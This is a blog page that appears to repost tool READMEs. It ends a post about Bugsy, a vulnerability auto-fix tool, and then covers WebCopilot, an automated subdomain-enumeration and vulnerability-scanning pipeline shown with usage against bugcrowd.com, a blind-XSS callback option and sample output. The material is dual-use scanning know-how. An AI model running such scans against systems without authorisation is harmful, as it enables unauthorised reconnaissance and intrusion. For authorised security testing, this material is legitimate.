dir="auto">This is a community edition version that only analyzes public GitHub repositories. Analyzing private repositories is allowed for a limited amount of time. Bugsy does not detect any vulnerabilities in your code; it uses findings detected by the SAST tools mentioned above.</p> <h2 dir="auto" tabindex="-1">Usage</h2> <p dir="auto">You can simply run Bugsy from the command line, using npx:</p> <div><pre><code>npx mobbdev</code></pre><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/mobb-dev/bugsy" rel="nofollow" target="_blank" title="Download Bugsy">Download Bugsy</a></span></b></div></div>
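<p dir="auto">The core idea of Analyze mode is to read a SAST report and keep only the finding types the remediation engine knows how to fix. A minimal sketch of that filtering step against a SARIF-shaped report (the fixable rule IDs are hypothetical, and Mobb's real remediation logic is far more involved):</p>

```python
import json

# Illustrative: filter a SARIF report down to issue types an auto-remediation
# tool might handle. The FIXABLE_RULES set is a hypothetical example list.
FIXABLE_RULES = {"js/sql-injection", "js/xss", "js/path-injection"}

def fixable_findings(sarif_text):
    """Return the ruleIds of results that match the fixable rule set."""
    report = json.loads(sarif_text)
    hits = []
    for run in report.get("runs", []):
        for result in run.get("results", []):
            rule = result.get("ruleId", "")
            if rule in FIXABLE_RULES:
                hits.append(rule)
    return hits
```

<p dir="auto">SARIF is the common output format of CodeQL and several other SAST tools, which is what makes this kind of vendor-agnostic filtering possible.</p>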
</div>
</article>
<div class="hreview"><br /></div>
<div style="clear: both;"></div>
<div class="post-footer"></div>OffensiveSechttp://www.blogger.com/profile/12324833783082823870noreply@blogger.com0tag:blogger.com,1999:blog-2588088702885294836.post-10807822401968224262024-02-18T11:15:00.000-08:002024-02-18T11:15:05.773-08:00WebCopilot - An Automation Tool That Enumerates Subdomains Then Filters Out Xss, Sqli, Open Redirect, Lfi, Ssrf And Rce Parameters And Then Scans For Vulnerabilities<article><div class="post-body entry-content" id="post-body-5177943909853444750" itemprop="articleBody"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzh6enUQ3A3LZlXWM4Kwy7XwE8GnZa1yi500_opJVgt47pSjH5_NMCNgQEtI2JAGrLmt12nyxFto7Ek7tUDgkEkDHYBrMB6zSRMPkd6y77q0t9-XbpfZPSH11XVx7iHSdIb82oesuy6R4ckIY5ZsTgCzr-8zg9t3nEwm-T1yhVcmMUnEl-o-Dddb1STTfj/s1792/WebCopilot.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1024" data-original-width="1792" height="366" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzh6enUQ3A3LZlXWM4Kwy7XwE8GnZa1yi500_opJVgt47pSjH5_NMCNgQEtI2JAGrLmt12nyxFto7Ek7tUDgkEkDHYBrMB6zSRMPkd6y77q0t9-XbpfZPSH11XVx7iHSdIb82oesuy6R4ckIY5ZsTgCzr-8zg9t3nEwm-T1yhVcmMUnEl-o-Dddb1STTfj/w640-h366/WebCopilot.png" width="640" /></a></div><p><strong><br /></strong></p><p><strong>WebCopilot</strong> is an automation tool designed to enumerate subdomains of the target and detect bugs using different open-source tools.</p> <p dir="auto">The script first enumerate all the subdomains of the given target domain using assetfinder, sublister, subfinder, amass, findomain, hackertarget, riddler and crt then do active subdomain enumeration using gobuster from SecLists wordlist then filters out all the live subdomains using dnsx then it extract titles of the subdomains using httpx & scans for subdomain takeover using subjack. 
Then it uses gauplus & waybackurls to crawl all the endpoints of the given subdomains, then uses gf patterns to filter out xss, lfi, ssrf, sqli, open redirect & rce parameters from those subdomains, and then scans for vulnerabilities on the subdomains using different open-source tools (like kxss, dalfox, openredirex, nuclei, etc.). Then it prints the results of the scan and saves all the output in a specified directory.</p><span><a name="more"></a></span><p dir="auto"><br /></p> <h1 dir="auto" tabindex="-1">Features</h1> <ul dir="auto"> <li>Subdomain Enumeration using <a href="https://github.com/tomnomnom/assetfinder" rel="nofollow" target="_blank" title="assetfinder">assetfinder</a>, <a href="https://github.com/aboul3la/Sublist3r" rel="nofollow" target="_blank" title="sublist3r">sublist3r</a>, <a href="https://github.com/projectdiscovery/subfinder" rel="nofollow" target="_blank" title="subfinder">subfinder</a>, <a href="https://github.com/OWASP/Amass" rel="nofollow" target="_blank" title="amass">amass</a>, <a href="https://github.com/Findomain/Findomain" rel="nofollow" target="_blank" title="findomain">findomain</a>, etc.</li> <li>Active Subdomain Enumeration using <a href="https://github.com/OJ/gobuster" rel="nofollow" target="_blank" title="gobuster">gobuster</a> & <a href="https://github.com/OWASP/Amass" rel="nofollow" target="_blank" title="amass">amass</a> from the <a href="https://github.com/danielmiessler/SecLists/tree/master/Discovery/DNS" rel="nofollow" target="_blank" title="SecLists/DNS">SecLists/DNS</a> wordlist.</li> <li>Extract titles and take screenshots of live subdomains using <a href="https://github.com/michenriksen/aquatone" rel="nofollow" target="_blank" title="aquatone">aquatone</a> & <a href="https://github.com/projectdiscovery/httpx" rel="nofollow" target="_blank" title="httpx">httpx</a>.</li> <li>Crawl all the endpoints of the subdomains using <a href="https://github.com/tomnomnom/waybackurls" rel="nofollow" target="_blank" 
title="waybackurls">waybackurls</a> & <a href="https://github.com/bp0lr/gauplus" rel="nofollow" target="_blank" title="gauplus">gauplus</a> and filter out XSS, SQLi, SSRF, etc parameters using <a href="https://github.com/tomnomnom/gf" rel="nofollow" target="_blank" title="gf patterns">gf patterns</a>.</li> <li>Run different open-source tools (like <a href="https://github.com/hahwul/dalfox" rel="nofollow" target="_blank" title="dalfox">dalfox</a>, <a href="https://github.com/projectdiscovery/nuclei" rel="nofollow" target="_blank" title="nuclei">nuclei</a>, <a href="https://github.com/sqlmapproject/sqlmap" rel="nofollow" target="_blank" title="sqlmap">sqlmap</a>, etc) to search for vulnerabilities on these parameters and then save all the outputs in the folder.</li> </ul> <h1 dir="auto" tabindex="-1">Usage</h1> <div><pre><code>g!2m0:~ webcopilot -h</code></pre></div> <div class="highlight highlight-source-js notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content=" ──────▄▀▄─────▄▀▄ ─────▄█░░▀▀▀▀▀░░█▄ ─▄▄──█░░░░░░░░░░░█──▄▄ █▄▄█─█░░▀░░┬░░▀░░█─█▄▄█ ██╗░░░░░░░██╗███████╗██████╗░░█████╗░░█████╗░██████╗░██╗██╗░░░░░░█████╗░████████╗ ░██║░░██╗░░██║██╔════╝██╔══██╗██╔══██╗██╔══██╗██╔══██╗██║██║░░░░░██╔══██╗╚══██╔══╝ ░╚██╗████╗██╔╝█████╗░░██████╦╝██║░░╚═╝██║░░██║██████╔╝██║██║░░░░░██║░░██║░░░██║░░░ ░░████╔═████║░██╔══╝░░██╔══██╗██║░░██╗██║░░██║██╔═══╝░██║██║░░░░░██║░░██║░░░██║░░░ ░░╚██╔╝░╚██╔╝░███████╗██████╦╝╚█████╔╝╚█████╔╝██║░░░░░██║███████╗╚█████╔╝░░░██║░░░ ░░░╚═╝░░░╚═╝░░╚══════╝╚═════╝░░╚════╝░░╚════╝░╚═╝░░░░░╚═╝╚══════╝░╚════╝░░░░╚═╝░░░ [●] @h4r5h1t.hrs | G!2m0 Usage: webcopilot -d <target> webcopilot -d <target> -s webcopilot [-d target] [-o output destination] [-t threads] [-b blind server URL] [-x exclude domains] Flags: -d Add your target [Requried] -o To save outputs in folder [Default: domain.com] -t Number of threads [Default: 100] -b Add your server for BXSS [Default: False] -x Exclude out of scope domains [Default: False] -s Run only 
Subdomain Enumeration [Default: False] -h Show this help message Example: webcopilot -d domain.com -o domain -t 333 -x exclude.txt -b testServer.xss Use https://xsshunter.com/ or https://interact.projectdiscovery.io/ to get your server" dir="auto"><pre><code> <br /> ──────▄▀▄─────▄▀▄<br /> ─────▄█░░▀▀▀▀▀░░█▄<br /> ─▄▄──█░░░░░░░░░░░█──▄▄<br /> █▄▄█─█░░▀░░┬░░▀░░█─█▄▄█<br /> ██╗░░░░░░░██╗███████╗██████╗░░█████╗░░█████╗░██████╗░██╗██╗░░░░░░█████╗░████████╗<br />░██║░░██╗░░██║██╔════╝██╔══██╗██╔══██╗██╔══██╗██╔══██╗██║██║░░░░░██╔══██╗╚══██╔══╝<br />░╚██╗████╗██╔╝█████╗░░██████╦╝██║░░╚═╝██║░░██║██████╔╝██║██║░░░░░██║░░██║░░░██║░░░<br />░░████╔═████║░██╔══╝░░██╔══██╗██║░░██╗██║░░██║██╔═══╝░██║██║ ░░░░██║░░██║░░░██║░░░<br />░░╚██╔╝░╚██╔╝░███████╗██████╦╝╚█████╔╝╚█████╔╝██║░░░░░██║███████╗╚█████╔╝░░░██║░░░<br />░░░╚═╝░░░╚═╝░░╚══════╝╚═════╝░░╚════╝ ░╚════╝░╚═╝░░░░░╚═╝╚══════╝░╚════╝░░░░╚═╝░░░<br /> [●] @h4r5h1t.hrs | G!2m0<br /><br />Usage:<br />webcopilot -d <target><br />webcopilot -d <target> -s<br />webcopilot [-d target] [-o output destination] [-t threads] [-b blind server URL] [-x exclude domains]<br /><br />Flags: <br /> -d Add your target [Requried]<br /> -o To save outputs in folder [Default: domain.com]<br /> -t Number of threads [Default: 100]<br /> -b Add your server for BXSS [Default: False]<br /> -x Exclude out of scope domains [Default: False]<br /> -s Run only Subdomain Enumeration [Default: False]<br /> -h Show this help message<br /><br />Example: webcopilot -d domain.com -o domain -t 333 -x exclude.txt -b testServer.xss<br />Use https://xsshunter.com/ or https://interact.projectdiscovery.io/ to get your server</code></pre></div> <h1 dir="auto" tabindex="-1">Installing WebCopilot</h1> <p dir="auto">WebCopilot requires <strong>git</strong> to install successfully. 
Run the following command as a <strong>root</strong> to install webcopilot</p> <div><pre><code>git clone https://github.com/h4r5h1t/webcopilot && cd webcopilot/ && chmod +x webcopilot install.sh && mv webcopilot /usr/bin/ && ./install.sh</code></pre></div> <h3 dir="auto" tabindex="-1">Tools Used:</h3> <p align="center" dir="auto"> <a href="https://github.com/projectdiscovery/subfinder" rel="nofollow" target="_blank" title="SubFinder">SubFinder</a> • <a href="https://github.com/aboul3la/Sublist3r" rel="nofollow" target="_blank" title="Sublist3r">Sublist3r</a> • <a href="https://github.com/Findomain/Findomain" rel="nofollow" target="_blank" title="Findomain">Findomain</a> • <a href="https://github.com/tomnomnom/gf" rel="nofollow" target="_blank" title="gf">gf</a> • <a href="https://github.com/devanshbatham/OpenRedireX" rel="nofollow" target="_blank" title="OpenRedireX">OpenRedireX</a> • <a href="https://github.com/projectdiscovery/dnsx" rel="nofollow" target="_blank" title="dnsx">dnsx</a> • <a href="https://github.com/sqlmapproject/sqlmap" rel="nofollow" target="_blank" title="sqlmap">sqlmap</a> • <a href="https://github.com/OJ/gobuster" rel="nofollow" target="_blank" title="gobuster">gobuster</a> • <a href="https://github.com/tomnomnom/assetfinder" rel="nofollow" target="_blank" title="assetfinder">assetfinder</a> • <a href="https://github.com/projectdiscovery/httpx" rel="nofollow" target="_blank" title="httpx">httpx</a> • <a href="https://github.com/Emoe/kxss" rel="nofollow" target="_blank" title="kxss">kxss</a> • <a href="https://github.com/tomnomnom/qsreplace" rel="nofollow" target="_blank" title="qsreplace">qsreplace</a> • <a href="https://github.com/projectdiscovery/nuclei" rel="nofollow" target="_blank" title="Nuclei">Nuclei</a> • <a href="https://github.com/hahwul/dalfox" rel="nofollow" target="_blank" title="dalfox">dalfox</a> • <a href="https://github.com/tomnomnom/anew" rel="nofollow" target="_blank" title="anew">anew</a> • <a 
href="https://github.com/stedolan/jq" rel="nofollow" target="_blank" title="jq">jq</a> • <a href="https://github.com/michenriksen/aquatone" rel="nofollow" target="_blank" title="aquatone">aquatone</a> • <a href="https://github.com/ameenmaali/urldedupe" rel="nofollow" target="_blank" title="urldedupe">urldedupe</a> • <a href="https://github.com/OWASP/Amass" rel="nofollow" target="_blank" title="Amass">Amass</a> • <a href="https://github.com/bp0lr/gauplus" rel="nofollow" target="_blank" title="gauplus">gauplus</a> • <a href="https://github.com/tomnomnom/waybackurls" rel="nofollow" target="_blank" title="waybackurls">waybackurls</a> • <a href="https://github.com/dwisiswant0/crlfuzz" rel="nofollow" target="_blank" title="crlfuzz">crlfuzz</a> </p> <h2 dir="auto" tabindex="-1">Running WebCopilot</h2> <p dir="auto">To run the tool on a target, just use the following command.</p> <div><pre><code>g!2m0:~ webcopilot -d bugcrowd.com</code></pre></div> <p dir="auto">The <code>-o</code> flag can be used to specify an output dir.</p> <div><pre><code>g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd</code></pre></div> <p dir="auto">The <code>-s</code> flag can be used for subdomain enumeration only (active + passive, and it also gets titles & screenshots).</p> <div><pre><code>g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -s </code></pre></div> <p dir="auto">The <code>-t</code> flag can be used to add threads to your scan for faster results.</p> <div><pre><code>g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -t 333 </code></pre></div> <p dir="auto">The <code>-b</code> flag can be used for blind XSS (OOB); you can get your server from <a href="https://xsshunter.com/" rel="nofollow" target="_blank" title="xsshunter">xsshunter</a> or <a href="https://interact.projectdiscovery.io/" rel="nofollow" target="_blank" title="interact">interact</a></p> <div><pre><code>g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -t 333 -b testServer.xss</code></pre></div> <p dir="auto">The 
<code>-x</code> flag can be used to exclude out-of-scope domains.</p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="g!2m0:~ echo out.bugcrowd.com > excludeDomain.txt g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -t 333 -x excludeDomain.txt -b testServer.xss" dir="auto"><pre><code>g!2m0:~ echo out.bugcrowd.com > excludeDomain.txt<br />g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -t 333 -x excludeDomain.txt -b testServer.xss</code></pre></div> <h2 dir="auto" tabindex="-1">Example</h2> <p dir="auto">Default options look like this:</p> <div><pre><code>g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd</code></pre></div> <div class="highlight highlight-source-js notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content=" ──────▄▀▄─────▄▀▄ ─────▄█░░▀▀▀▀▀░░█▄ ─▄▄──█░░░░░░░░░░░█──▄▄ █▄▄█─█░░▀░░┬░░▀░░█─█▄▄█ ██╗░░░░░░░██╗███████╗██████╗░░█████╗░░█████╗░██████╗░██╗██╗░░░░░░█████╗░████████╗ ░██║░░██╗░░██║██╔════╝██╔══██╗██╔══██╗██╔══██╗██╔══██╗██║██║░░░░░██╔══██╗╚══██╔══╝ ░╚██╗████╗██╔╝█████╗░░██████╦╝██║░░╚═╝██║░░██║██████╔╝██║██║░░░░░██║░░██║░░░██║░░░ ░░████╔═████║░██╔══╝░░██╔══██╗██║░░██╗██║░░██║██╔═══╝░██║██║░░░░░██║░░██║░░░██║░░░ ░░╚██╔╝░╚██╔╝░███████╗██████╦╝╚█████╔╝╚█████╔╝██║░░░░░██║███████╗╚█████╔╝░░░██║░░░ ░░░╚═╝░░░╚═╝░░╚══════╝╚═════╝░░╚════╝░░╚════╝░╚═╝░░░░░╚═╝╚══════╝░╚════╝░░░░╚═╝░░░ [●] @h4r5h1t.hrs | G!2m0 [❌] Warning: Use with caution. You are responsible for your own actions. [❌] Developers assume no liability and are not responsible for any misuse or damage cause by this tool. Target: bugcrowd.com Output: /home/gizmo/targets/bugcrowd Threads: 100 Server: False Exclude: False Mode: Running all Enumeration Time: 30-08-2021 15:10:00 [!] Please wait while scanning... 
[●] Subdoamin Scanning is in progress: Scanning subdomains of bugcrowd.com [●] Subdoamin Scanned - [assetfinder✔] Subdomain Found: 34 [●] Subdoamin Scanned - [sublist3r✔] Subdomain Found: 29 [●] Subdoamin Scanned - [subfinder✔] Subdomain Found: 54 [●] Subdoamin Scanned - [amass✔] Subdomain Found: 43 [●] Subdoamin Scanned - [findomain✔] Subdomain Found: 27 [●] Active Subdoamin Scanning is in progress: [!] Please be patient. This may take a while... [●] Active Subdoamin Scanned - [gobuster✔] Subdomain Found: 11 [●] Active Subdoamin Scanned - [amass✔] Subdomain Found: 0 [●] Subdomain Scanning: Filtering out of scope subdomains [●] Subdomain Scanning: Filtering Alive subdomains [●] Subdomain Scanning: Getting titles of valid subdomains [●] Visual inspection of Subdoamins is completed. Check: /subdomains/aquatone/ [●] Scanning Completed for Subdomains of bugcrowd.com Total: 43 | Alive: 30 [●] Endpoints Scanning Completed for Subdomains of bugcrowd.com Total: 11032 [●] Vulnerabilities Scanning is in progress: Getting all vulnerabilities of bugcrowd.com [●] Vulnerabilities Scanned - [XSS✔] Found: 0 [●] Vulnerabilities Scanned - [SQLi✔] Found: 0 [●] Vulnerabilities Scanned - [LFI✔] Found: 0 [●] Vulnerabilities Scanned - [CRLF✔] Found: 0 [●] Vulnerabilities Scanned - [SSRF✔] Found: 0 [●] Vulnerabilities Scanned - [Sensitive Data✔] Found: 0 [●] Vulnerabilities Scanned - [Open redirect✔] Found: 0 [●] Vulnerabilities Scanned - [Subdomain Takeover✔] Found: 0 [●] Vulnerabilities Scanned - [Nuclie✔] Found: 0 [●] Vulnerabilities Scanning Completed for Subdomains of bugcrowd.com Check: /vulnerabilities/ ▒█▀▀█ █▀▀ █▀▀ █░░█ █░░ ▀▀█▀▀ ▒█▄▄▀ █▀▀ ▀▀█ █░░█ █░░ ░░█░░ ▒█░▒█ ▀▀▀ ▀▀▀ ░▀▀▀ ▀▀▀ ░░▀░░ [+] Subdomains of bugcrowd.com [+] Subdomains Found: 0 [+] Subdomains Alive: 0 [+] Endpoints: 11032 [+] XSS: 0 [+] SQLi: 0 [+] Open Redirect: 0 [+] SSRF: 0 [+] CRLF: 0 [+] LFI: 0 [+] Sensitive Data: 0 [+] Subdomain Takeover: 0 [+] Nuclei: 0 " dir="auto"><pre><code> ──────▄▀▄─────▄▀▄<br /> 
─────▄█░░▀▀▀▀▀░░█▄<br /> ─▄▄──█░░░░░░░░░░░█──▄▄<br /> █▄▄█─█░░▀░░┬░░▀░░█─█▄▄█<br /> ██╗░░░░░░░██╗███████╗██████╗░░█████╗░ █████╗░██████╗░██╗██╗░░░░░░█████╗░████████╗<br />░██║░░██╗░░██║██╔════╝██╔══██╗██╔══██╗██╔══██╗██╔══██╗██║██║░░░░░██╔══██╗╚══██╔══╝<br />░╚██╗████╗██╔╝█ ███╗░░██████╦╝██║░░╚═╝██║░░██║██████╔╝██║██║░░░░░██║░░██║░░░██║░░░<br />░░████╔═████║░██╔══╝░░██╔══██╗██║░░██╗██║░░██║██╔═══╝░██║██║░░░░░██║░░██║░░ ██║░░░<br />░░╚██╔╝░╚██╔╝░███████╗██████╦╝╚█████╔╝╚█████╔╝██║░░░░░██║███████╗╚█████╔╝░░░██║░░░<br />░░░╚═╝░░░╚═╝░░╚══════╝╚═════╝░░╚════╝░░╚════╝░╚═╝░░░ ░╚═╝╚══════╝░╚════╝░░░░╚═╝░░░<br /> [●] @h4r5h1t.hrs | G!2m0<br /><br /><br />[❌] Warning: Use with caution. You are responsible for your own actions.<br />[❌] Developers assume no liability and are not responsible for any misuse or damage cause by this tool.<br /><br /><br />Target: bugcrowd.com<br />Output: /home/gizmo/targets/bugcrowd<br />Threads: 100<br />Server: False<br />Exclude: False<br />Mode: Running all Enumeration<br />Time: 30-08-2021 15:10:00<br /><br />[!] Please wait while scanning...<br /><br />[●] Subdoamin Scanning is in progress: Scanning subdomains of bugcrowd.com<br />[●] Subdoamin Scanned - [assetfinder✔] Subdomain Found: 34<br />[●] Subdoamin Scanned - [sublist3r✔] Subdomain Found: 29<br />[●] Subdoamin Scanned - [subfinder✔] Subdomain Found: 54<br />[●] Subdoamin Scanned - [amass✔] Subdomain Found: 43<br />[●] Subdoamin Scanned - [findomain✔] Subdomain Found: 27<br /><br />[●] Active Subdoamin Scanning is in progress:<br />[!] Please be patient. This may take a while...<br />[●] Active Subdoamin Scanned - [gobuster✔] Subdomain Found: 11<br />[●] Active Subdoamin Scanned - [amass✔] Subdomain Found: 0<br /><br />[●] Subdomain Scanning: Filtering out of scope subdomains<br />[●] Subdomain Scanning: Filtering Alive subdomains<br />[●] Subdomain Scanning: Getting titles of valid subdomains<br />[●] Visual inspection of Subdoamins is completed. 
Check: /subdomains/aquatone/<br /><br />[●] Scanning Completed for Subdomains of bugcrowd.com Total: 43 | Alive: 30<br /><br />[●] Endpoints Scanning Completed for Subdomains of bugcrowd.com Total: 11032<br />[●] Vulnerabilities Scanning is in progress: Getting all vulnerabilities of bugcrowd.com<br />[●] Vulnerabilities Scanned - [XSS✔] Found: 0<br />[●] Vulnerabilities Scanned - [SQLi✔] Found: 0<br />[●] Vulnerabilities Scanned - [LFI✔] Found: 0<br />[●] Vulnerabilities Scanned - [CRLF✔] Found: 0<br />[●] Vulnerabilities Scanned - [SSRF✔] Found: 0<br />[●] Vulnerabilities Scanned - [Sensitive Data✔] Found: 0<br />[●] Vulnerabilities Scanned - [Open redirect✔] Found: 0<br />[●] Vulnerabilities Scanned - [Subdomain Takeover✔] Found: 0<br />[●] Vulnerabilities Scanned - [Nuclie✔] Found: 0<br />[●] Vulnerabilities Scanning Completed for Subdomains of bugcrowd.com Check: /vulnerabilities/<br /><br /><br />▒█▀▀█ █▀▀ █▀▀ █░░█ █░░ ▀▀█▀▀<br />▒█▄▄▀ █▀▀ ▀▀█ █░░█ █░░ ░░█░░<br />▒█░▒█ ▀▀▀ ▀▀▀ ░▀▀▀ ▀▀▀ ░░▀░░<br /><br />[+] Subdomains of bugcrowd.com<br />[+] Subdomains Found: 0<br />[+] Subdomains Alive: 0<br />[+] Endpoints: 11032<br />[+] XSS: 0<br />[+] SQLi: 0<br />[+] Open Redirect: 0<br />[+] SSRF: 0<br />[+] CRLF: 0<br />[+] LFI: 0<br />[+] Sensitive Data: 0<br />[+] Subdomain Takeover: 0<br />[+] Nuclei: 0</code></pre></div> <hr /> <h3 dir="auto" tabindex="-1">Acknowledgement</h3> <p dir="auto">WebCopilot is inspired from <a href="https://github.com/R0X4R/Garud" rel="nofollow" target="_blank" title="Garud">Garud</a> & <a href="https://github.com/R0X4R/Pinaak" rel="nofollow" target="_blank" title="Pinaak">Pinaak</a> by <a href="https://github.com/R0X4R/" rel="nofollow" target="_blank" title="ROX4R">ROX4R</a>.</p><p dir="auto"><br /></p><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/h4r5h1t/webcopilot" rel="nofollow" target="_blank" title="Download Webcopilot">Download 
Webcopilot</a></span></b></div>
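<p dir="auto">Two of the steps WebCopilot chains together can be sketched in a few lines: merging the subdomain lists produced by the different enumeration tools, and bucketing crawled URLs by parameter name the way gf patterns do. The regexes below are illustrative stand-ins for the real gf pattern files, not WebCopilot's actual code:</p>

```python
import re

# Illustrative parameter patterns; the real gf pattern files are far larger.
PARAM_PATTERNS = {
    "xss": re.compile(r"[?&](q|search|query|keyword)=", re.I),
    "sqli": re.compile(r"[?&](id|user|cat|page_id)=", re.I),
    "lfi": re.compile(r"[?&](file|path|template|include)=", re.I),
    "redirect": re.compile(r"[?&](url|next|redirect|dest)=", re.I),
}

def merge_subdomains(*tool_outputs):
    """Union the newline-separated output of several enumeration tools,
    normalizing case and trailing dots so duplicates collapse."""
    seen = set()
    for output in tool_outputs:
        for line in output.splitlines():
            host = line.strip().lower().rstrip(".")
            if host:
                seen.add(host)
    return sorted(seen)

def bucket_urls(urls):
    """Assign each URL to every vulnerability class whose pattern matches."""
    buckets = {name: [] for name in PARAM_PATTERNS}
    for url in urls:
        for name, pat in PARAM_PATTERNS.items():
            if pat.search(url):
                buckets[name].append(url)
    return buckets
```

<p dir="auto">In the real pipeline these roles are played by <code>anew</code>/<code>urldedupe</code> for deduplication and by <code>gf</code> for pattern matching; the sketch only shows why those stages compose cleanly.</p>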
</div>
</article>
<div class="hreview"><br /></div>
<div style="clear: both;"></div>
<div class="post-footer"></div>OffensiveSechttp://www.blogger.com/profile/12324833783082823870noreply@blogger.com0